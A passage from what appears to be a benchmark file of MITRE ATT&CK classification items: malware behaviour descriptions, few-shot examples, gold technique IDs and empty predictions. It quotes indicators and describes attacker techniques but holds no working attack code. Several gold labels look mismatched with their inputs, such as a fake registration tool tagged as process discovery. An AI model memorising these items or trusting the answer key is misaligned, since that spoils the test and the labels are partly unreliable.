temp.zip file saved in the %temp% folder, then base64 encodes it and uploads it to control server.\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1560: Archive Collected Data\n", "input": "\nHere is the code:The goal of this code is to get information from the properties of the document (\"Subject\", \"Company\", \"Category\", \"Hyperlink base\" and finally \"Comments\")", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: LAPSUS$ has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval.\n\t - T1111: Multi-Factor Authentication Interception\n- Text: PoshC2 has modules for keystroke logging and capturing credentials from spoofed Outlook authentication messages.\n\t - T1056.001: Input Capture - Keylogging\n- Text: ROKRAT can use the `GetForegroundWindow` and `GetWindowText` APIs to discover where the user is typing.\n\t - T1010: Application Window Discovery\n", "input": "\nExample of decoded keylogger output", "gold": "- T1056: Input Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Assuming the victim opens the attachment, the infection process begins as described in the following section.Many of the distribution servers that are being used to host the HawkEye keylogger binaries that are retrieved during the infection process are hosting large numbers of malicious binaries and, in many cases, contain open directory listings that can be used to identify the scope of the infections that they are being used to facilitate\n\t - T1057: Process Discovery\n\t - T1056: Input Capture\n- Text: ZLib has the ability to discover and manipulate Windows services.\n\t - T1007: System Service Discovery\n- Text: The toolset used by the Magic Hound campaign was an assortment of custom tools, as well as open sourced tools available to the general public\n\t - T1518.001: Software Discovery - Security Software Discovery\n", "input": "\nmay collect process information by running tasklist on a victim.", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: REvil has used encrypted strings and configuration files.\n\t - T1027: Obfuscated Files or Information\n- Text: The following code example shows the false flag being set (5 > 115) and the ETransaksi.diomadnfagaghagh method being called: \u00a0int num = 5; int num2 = 155; bool flag = num > num2; if (flag) { } else { NewLateBinding.LateCall(ETransaksi.diomadnfagaghagh(), null, \"Invoke\", new object[] { null, new object[0] }, null, null, null, true);The payload uses this technique to run a chain of methods that eventually carry out its malicious task\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Payloads are now hosted on compromised websites. The payloads hosted on these websites consist of seemingly benign BMP image files. The malicious macros download the images and the ObliqueRAT payload is extracted to disk. The ObliqueRAT payload is renamed with the .pif file extension\n\t - T1027.003: Obfuscated Files or Information - Steganography\n", "input": "\nAfter decompiling it from the PE file, it is heavily obfuscated and still almost unreadable.We deobfuscated the script to understand how the infection process works", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Bumblebee has been spread through e-mail campaigns with malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: has sent spearphishing emails with malicious attachments, including .rtf, .doc, and .xls files.\n\t - T1598.002: Phishing for Information - Spearphishing Attachment\n- Text: APT38 has conducted spearphishing campaigns using malicious email attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n", "input": "\nhas leveraged both Spearphishing Link and Spearphishing Attachment attempting to gain User Execution.", "gold": "- T1204: User Execution", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: When each file is encrypted, registry keys are created under HKU\\{SID}\\Software\\Microsoft\\ RestartManager \\ which are used to track metadata pertaining to the file being encrypted, such as owner, sequence, session and file hash\n\t - T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder\n- Text: As part of the exploitation process, the above value will be written to the registry under the %windir% variable, and deleted after execution\n\t - T1112: Modify Registry\n- Text: LazyScripter has used PowerShell scripts to execute malicious code.\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\nThe macro contains a PowerShell script to persist in the \"Run\" registry key, \"KCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SystemTextEncoding\".", "gold": "- T1546.013: Event Triggered Execution - PowerShell Profile\n- T1059.001: Command and Scripting Interpreter - PowerShell", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The two resources that contain commands that ISMInjector uses for persistence are named \u201cTsk1\u201d and \u201cTsk2\u201d. The specific commands within each of these resources are within Table 1. At a high level, the\u201cTsk1\u201d command creates a scheduled task named \u201cReportHealth\u201d that is meant to run a payload saved to \"%localappdata%\\srvHealth.exe\u201d every 4 minutes. The \u201cTsk2\u201d command creates a scheduled task that runs every 2 minutes that is responsible for saving the payload to srvHealth.exe. This task saves the payload to this location using the \u201ccertutil\u201d command to decode the original payload saved to \u201csrvBS.txt\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: The attack group has made incremental changes to ZeroT since our last analysis. The encrypted ZeroT payload, named Mctl.mui, is decoded in memory revealing a similarly tampered PE header and only slightly modified code when compared to ZeroT payloads we analyzed previously\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: InvisiMole uses a variation of the XOR cipher to encrypt files before exfiltration.\n\t - T1560.003: Archive Collected Data - Archive via Custom Method\n", "input": "\nOne variant decrypts an archive using an RC4 key, then decompresses and installs the decrypted malicious DLL module. Another variant decodes the embedded file by XORing it with the value \"0x35\".", "gold": "- T1140: Deobfuscate/Decode Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: CharmPower can retrieve C2 domain information from actor-controlled S3 buckets.\n\t - T1102.001: Web Service - Dead Drop Resolver\n- Text: The Delphi variant of Cannon does not use legitimate web-based email services for its C2 communications, instead opting to use email accounts at an actor owned domain, ambcomission[.]com\n\t - T1102: Web Service\n- Text: Numbered Panda has a long list of high-profile victims and is known by a number of names including: DYNCALC, IXESHE, JOY RAT, APT-12, etc. Numbered Panda has targeted a variety of victims including but not limited to media outlets, high-tech companies, and multiple governments. Numbered Panda has targeted organizations in time-sensitive operations such as the Fukushima Reactor Incident of 2011, likely filling intelligence gaps in the ground cleanup/mitigation operations. One of the most interesting techniques that Numbered Panda likes to use is to dynamically calculate the Command and Control (C2) port by resolving a DNS. The malware will typically use two DNS names for communication: one is used for command and control; the other is used with an algorithm to calculate the port to communicate to. There are several variations of the algorithm used to calculate the C2 port, but one of the most common is to multiply the first two octets of the IP address and add the third octet to that value. Numbered Panda will frequently use blogs or WordPress in the c2 infrastructure, which helps to make the network traffic look more legitimate. CrowdStrike has observed Numbered Panda targeting high-tech, defense contractors, media organizations, and western governments. Disclosure of this information went through the same IGL process as discussed in the\u00a0Whois Anchor Panda blog post\n\t - T1102.002: Web Service - Bidirectional Communication\n", "input": "\ncan use multiple C2 channels, including RSS feeds, Github, forums, and blogs. also collects C2 information via a dead drop resolver.", "gold": "- T1102: Web Service", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The backdoor determines its C2 server using a Domain Generation Algorithm (DGA) to construct and resolve a subdomain of avsvmcloud[.]com. The Update method is responsible for initializing cryptographic helpers for the generation of these random C2 subdomains. Subdomains are generated by concatenating a victim userId with a reversible encoding of the victims local machine domain name\n\t - T1132.001: Data Encoding - Standard Encoding\n- Text: PowGoop can use a modified Base64 encoding mechanism to send data to and from the C2 server.\n\t - T1132.002: Data Encoding - Non-Standard Encoding\n- Text: The VB.NET variant then gathers system information and running processes like other Zebrocy variants by running the following commands: systeminfo & tasklist The URL used to send the system information, running processes and a screenshot to the C2 server is: hxxp://109.248.148[.]42/agr-enum/progress-inform/cube.php?res=[serial number] The VB.NET variant of Zebrocy uses an HTTP POST request to the URL above to transmit the gathered data, of which is included within the HTTP POST data that is structured as follows (notice the spaces before and after ampersand \u201c&\u201d): data=[system information and running processes] & arg=[screenshot in BMP format] C# Zebrocy Variant The C# variant of Zebrocy is similar to other variants in functionality, but also has several unique attributes that are worth discussing\n\t - T1082: System Information Discovery\n\t - T1057: Process Discovery\n\t - T1132: Data Encoding\n", "input": "\nThe malware uses custom Base64 encoding schemes to obfuscate data command and control traffic in the message body of HTTP requests.", "gold": "- T1001: Data Obfuscation", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: 2.\u00a0\u00a0\u00a0\u00a0 The macro decodes the dropped files using Windows certutil.exe (certutil.exe is a legitimate built-in command-line program to manage certificates in Windows). 3.\u00a0\u00a0\u00a0\u00a0 The macro creates a copy of the files with their proper extensions using Extensible Storage Engine Utilities (esentutil.exe) (esentutil.exe is also a legitimate program that is pre-installed in Windows). The dropped files include the following: GUP.exe\u00a0:\u00a0GUP, a free (LGPL) Generic Updater.\u00a0GUP is an open source binary used by Notepad++ for software updates\n\t - T1055.012: Process Injection - Process Hollowing\n\t - T1106: Native API\n\t - T1036: Masquerading\n\t - T1010: Application Window Discovery\n- Text: Waterbear can use thread injection to inject shellcode into the process of security software.\n\t - T1055.003: Process Injection - Thread Execution Hijacking\n- Text: Leafminer has used Process Doppelg\u00e4nging to evade security software while deploying tools on compromised systems.\n\t - T1055.013: Process Injection - Process Doppelg\u00e4nging\n", "input": "\nUnpacks the code in memory via process hollowing", "gold": "- T1055.012: Process Injection - Process Hollowing", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: RogueRobin has a command named \"$screenshot\" that may be responsible for taking screenshots of the victim machine.\n\t - T1113: Screen Capture\n- Text: created a custom video recording capability that could be used to monitor operations in the victim's environment.\n\t - T1125: Video Capture\n- Text: Mustang Panda used custom batch scripts to collect files automatically from a targeted system.\n\t - T1119: Automated Collection\n", "input": "\ntakes screenshots of the user's desktop.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Lazarus Group has used social media platforms, including LinkedIn and Twitter, to send spearphishing messages.\n\t - T1566.003: Phishing - Spearphishing via Service\n- Text: QakBot has spread through emails with malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files.\n\t - T1204.002: User Execution - Malicious File\n", "input": "\nVisitors are asked to download the \u201cUniversity Of Oxford Job Symposium Pre-Register Tool\u201d: The downloaded file (which is also signed with an AI Squared certificate), is a fake registration tool built by the attackers: OxfordSymposiumRegTool.exe f77ee804de304f7c3ea6b87824684b33 If run by the victim, their computer would get infected, while they are shown this registration process: Note that after completing the \u201cregistration process\u201d, the victim is asked to send the form to an email address in\u00a0oxford-careers[.]com, which also belongs to the attackers", "gold": "- T1057: Process Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Gelsemium has used dynamic DNS in its C2 infrastructure.\n\t - T1568: Dynamic Resolution\n- Text: The new domain names follow the same pattern as previously reported, except that they swap the top level domain name for another. We know that the threat actor has used the \u201c.me\u201d TLD in their past campaigns against some academic intuitions and this is still the case, along side \u201c.tk\u201d and \u201c.cf\n\t - T1583.001: Acquire Infrastructure - Domains\n- Text: Kimsuky has compromised legitimate sites and used them to distribute malware.\n\t - T1584.001: Compromise Infrastructure - Domains\n", "input": "\n(Source: Dell SecureWorks) Appendix D \u2014 Domain name parking example CTU researchers have observed TG-3390 parking domains by pointing their A record to a non-routable IP space, including the 127.0.0.[x] loopback address", "gold": "- T1016: System Network Configuration Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: njRAT enumerates the victim operating system and computer name during the initial infection.\n\t - T1082: System Information Discovery\n- Text: Crutch can exfiltrate data over the primary C2 channel (Dropbox HTTP API).\n\t - T1041: Exfiltration Over C2 Channel\n- Text: fprii.net 185.130.212.254 Domain used for spear phish sender e-mail address and to host malicious documents\n\t - T1016: System Network Configuration Discovery\n", "input": "\ncollects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.", "gold": "- T1082: System Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: esentutl can be used to copy files from a given URL.\n\t - T1105: Ingress Tool Transfer\n- Text: When executed, the malware first establishes a SOCKS5 connection to 192.157.198.103 using TCP port 1913. The malware sends the SOCKS5 connection request \"05 01 00\" and verifies the server response starts with \"05 00\". The malware then requests a connection to 192.184.60.229 on TCP port 81 using the command \"05 01 00 01 c0 b8 3c e5 00 51\" and verifies that the first two bytes from the server are \"05 00\" (c0 b8 3c e5 is the IP address and 00 51 is the port in network byte order\n\t - T1104: Multi-Stage Channels\n- Text: Use of obfuscated shellcode executed via PowerShell to download a \"reverse_tcp\" payload from Metasploit onto victim systems\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", "input": "\ncan download additional components from the C2 server.", "gold": "- T1105: Ingress Tool Transfer", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host.\n\t - T1082: System Information Discovery\n- Text: FunnyDream can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.\n\t - T1083: File and Directory Discovery\n- Text: can obtain a list of smart card readers attached to the victim.\n\t - T1120: Peripheral Device Discovery\n", "input": "\nDRIVE Lists the logical drives and the type, as well the total/free space of the fixed devices", "gold": "- T1083: File and Directory Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Interestingly, there is an option in the RC2CL module to turn off its backdoor functionality and act as a proxy. In this case, the malware turns off the Windows firewall and creates a server that relays communication between a client and C&C server, or between two clients\n\t - T1090.001: Proxy - Internal Proxy\n- Text: POLONIUM has used the AirVPN service for operational activity.\n\t - T1090: Proxy\n- Text: The Trojan uses HTTP POST requests, as seen in Figure 1 to send data to the C2 server, and GET requests to receive commands from the server, as seen in Figure 2\n\t - T1071: Application Layer Protocol\n", "input": "\nsupports peer connections.", "gold": "- T1090: Proxy", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: sqlmap can be used to automate exploitation of SQL injection vulnerabilities.\n\t - T1190: Exploit Public-Facing Application\n- Text: Stuxnet used xp_cmdshell to store and execute SQL code.\n\t - T1505.001: Server Software Component - SQL Stored Procedures\n- Text: APT29 has conducted widespread scanning of target environments to identify vulnerabilities for exploit.\n\t - T1595.002: Active Scanning - Vulnerability Scanning\n", "input": "\ncan be used to automate exploitation of SQL injection vulnerabilities.", "gold": "- T1190: Exploit Public-Facing Application", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ZxShell can capture screenshots.\n\t - T1113: Screen Capture\n- Text: Metamorfo can enumerate all windows on the victim\u2019s machine.\n\t - T1010: Application Window Discovery\n- Text: Specifies the screen coordinates to take -zip Name of password (from configuration data) protected zip archive -clipboard Screenshot file name where a bitmap from the clipboard is saved in Cache005 subdirectory, zipped with password from configuration Data exfiltration Exfiltration is done through the bitsadmin.exe utility\n\t - T1113: Screen Capture\n\t - T1115: Clipboard Data\n\t - T1560: Archive Collected Data\n\t - T1132: Data Encoding\n\t - T1486: Data Encrypted for Impact\n", "input": "\nis capable of capturing screenshots.", "gold": "- T1113: Screen Capture", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ISMInjector creates scheduled tasks to establish persistence.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: POWERSTATS can use VBScript (VBE) code for execution.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: The malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on Windows systems\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n\t - T1053: Scheduled Task/Job\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n", "input": "\nThe Trojan accesses two resources, named Sch and VBS that contains obfuscated strings that contain the command to create the scheduled task and the VBScript to run", "gold": "- T1027: Obfuscated Files or Information", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The browser extension serves as adware and an infostealer, leaking all of the user\u2019s search engine queries. We discovered significant changes and additions of capabilities throughout this campaign's evolution, and we predict further changes as this campaign continues.\n\t - T1217: Browser Information Discovery\n- Text: Targets are sent spear phishing e-mails that lead them to a web site displaying a lure document and are immediately prompted to install a malicious Google Chrome extension. It then redirects the user to install a \u201cFont Manager\u201d extension from the Chrome Web Store, as seen in Figure 2. Figure 2: HTML Source of Phishing Page The malicious extensions, now removed from the Chrome Web Store, contain reviews left by the threat actor using compromised Google+ accounts. It should be noted however, that some users reported deleting the extension immediately because it prevented the Chrome browser from functioning properly. The malicious Chrome extensions declare permissions to run on every URL in the browser, as seen in Figure 3. Loading jQuery.js from an external site makes no sense, since the latest version of extension has a legitimate jQuery.js included in the extension bundle. Figure 4:\u00a0Given the threat actor\u2019s propensity for password theft, and the fact that the malicious Chrome extensions were situated to read data from every website, it's likely that the intent is to steal browser cookies and passwords. Figure 5: Certificate used to sign MECHANICAL/GREASE While the threat actors did use a few tools to automate intrusions, we also found a ZIP archive of tools that demonstrate their propensity for password theft to propagate. Advise users to be wary of any prompts to install browser extensions, even if they are hosted on an official extension site. They spent significant time and resources doing reconnaissance on their targets, as evidenced by the comments left on the Chrome extension page\n\t - T1176: Browser Extensions\n- Text: Although it has only recently been launched, IcedID already uses redirection attacks. The redirection scheme IcedID uses is not a simple handover to another website with a different URL. Rather, it is designed to appear as seamless as possible to the victim. These tactics include displaying the legitimate bank\u2019s URL in the address bar and the bank\u2019s correct SSL certificate, which is made possible by keeping a live connection with the actual bank\u2019s site\n\t - T1185: Browser Session Hijacking\n", "input": "\ncollects information on bookmarks from Google Chrome.", "gold": "- T1217: Browser Information Discovery", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: can be configured to have commands relayed over a peer-to-peer network of infected hosts. This can be used to limit the number of egress points, or provide access to a host without direct internet access.\n\t - T1090: Proxy\n- Text: POWERSTATS has connected to C2 servers through proxies.\n\t - T1090.002: Proxy - External Proxy\n- Text: Gain access to the victim\u2019s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator\u2019s account\n\t - T1021.001: Remote Services - Remote Desktop Protocol\n\t - T1090.001: Proxy - Internal Proxy\n", "input": "\nCommand Action sign Requests system information settings Requests settings from C2 server logs Uploads harvested passwords wallet Uploads harvested cryptocurrency wallet data proxy Indicates SOCKS proxy port opened miner Cryptocurrency miner commands error Reports errors to C2 server ddos DDoS attack commands Table 1: Zyklon accepted commands The following figures show the initial request and subsequent server response for the \u201csettings\u201d (Figure 13), \u201csign\u201d (Figure 14), and \u201cddos\u201d (Figure 15) commands", "gold": "- T1090: Proxy\n- T1059: Command and Scripting Interpreter", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: During Operation Wocao, threat actors used PowerShell to add and delete rules in the Windows firewall.\n\t - T1562.004: Impair Defenses - Disable or Modify System Firewall\n- Text: Aquatic Panda has attempted to stop endpoint detection and response (EDR) tools on compromised systems.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", "input": "\ndisables the Windows firewall before binding to a port.", "gold": "- T1562.001: Impair Defenses - Disable or Modify Tools", "predicted": "" }, { "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: These dropped files bundle functionality for both 64bit and 32bit Windows systems and are all located within one directory: C:\\Documents and Settings\\user\\Application Data\\ATI_Subsystem\\ 6761106f816313394a653db5172dc487,amdhcp32.dll,54kb \u00a0\u2190 32bit dll,CompiledOn:2014.07.02 21:13:24 d596827d48a3ff836545b3a999f2c3e3,aticaldd.dll,60kb \u00a0\u2190 64bit dll,CompiledOn:2014.07.02 21:13:26 bc626c8f11ed753f33ad1c0fe848d898,atiumdag.dll,285kb \u2190 32bit dll, Trojan.Win32.CozyDuke.a, CompiledOn:2014.07.02 21:13:26 4152e79e3dbde55dcf3fc2014700a022,6kb,racss.dat The code copies rundll32.exe from windows\\system32 to its newly created %appdata%\\ATI_Subsystem subdirectory as \u201camdocl_as32.exe\u201d alongside the three dll\u2019s listed above\n\t - T1055: Process Injection\n\t - T1574.001: Hijack Execution Flow - DLL Search Order Hijacking\n\t - T1218.011: System Binary Proxy Execution - Rundll32\n\t - T1574.002: Hijack Execution Flow - DLL Side-Loading\n- Text: If opened, the dropper runs a loader known as Trojan.Vcrodat on the computer. Whitefly has consistently used a technique known as search order hijacking to run Vcrodat. If no path is provided, Windows searches for the DLL in specific locations on the computer in a pre-defined order. Attackers can therefore give a malicious DLL the same name as a legitimate DLL but place it ahead of the legitimate version in the search order so that it will be loaded when Windows searches for it. Whitefly frequently delivers Vcrodat as a malicious DLL that has the same name as DLLs belonging to legitimate software from various security vendors. The group 